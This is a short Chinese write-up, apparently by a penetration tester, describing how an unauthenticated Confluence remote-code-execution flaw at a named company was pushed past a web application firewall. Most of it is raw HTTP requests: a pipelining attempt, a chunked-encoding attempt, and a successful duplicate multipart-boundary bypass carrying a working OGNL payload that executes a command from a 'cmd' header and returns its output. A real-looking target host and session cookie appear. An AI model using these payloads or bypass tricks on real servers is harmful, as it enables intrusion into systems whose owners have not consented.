面试过程中发现的某企业存在Confluence未授权rce的漏洞,隔了一个周末后发现被waf拦截了,所以多了个和waf对抗的故事......
1、HTTP隧道传输/ HTTP pipeline【失败】
通过使用 Connection: keep-alive 达到一次传输多个http包的效果;
POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Content-Length: 203
queryString=aPOST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host: help.hualala.com
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
cmd: pwd
queryString={
2、分块传输/ Chunked Transfer (HTTP 1.1)【失败】
插件:http://github.com/c0ny1/chunked-coding-converter
3、HTTP协议未覆盖【成功】
利用 Content-type: multipart/form-data绕过上传的边界(boundary)限制。
通过多boundary定义,使waf检测范围和实际上传范围不一致,从而绕过waf上传恶意内容:
POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=--------998091706;boundary=--------998091705
X-Requested-With: XMLHttpRequest
x-atlassian-mau-ignore: true
Content-Length: 678
Connection: close
Cookie: JSESSIONID=E4513E8589FBD6AB5128994E87ADA4D0
cmd: id
----------998091706
Content-Disposition: form-data; name="queryString"
sss
----------998091706--
----------998091705
Content-Disposition: form-data; name="queryString"
\u0027+#{\u0022\u0022[\u0022class\u0022].forName(\u0022javax.script.ScriptEngineManager\u0022).newInstance().getEngineByName(\u0022js\u0022).eval(\u0022var c=com.atlassian.core.filters.ServletContextThreadLocal.getRequest().getHeader(\u0027cmd\u0027);var x=java.lang.Runtime.getRuntime().exec(c);var out=com.atlassian.core.filters.ServletContextThreadLocal.getResponse().getOutputStream();org.apache.commons.io.IOUtils.copy(x.getInputStream(),out);out.flush();\u0022)}+\u0027
----------998091705--
高并发、垃圾数据都尝试了,均未成功,就不放截图了。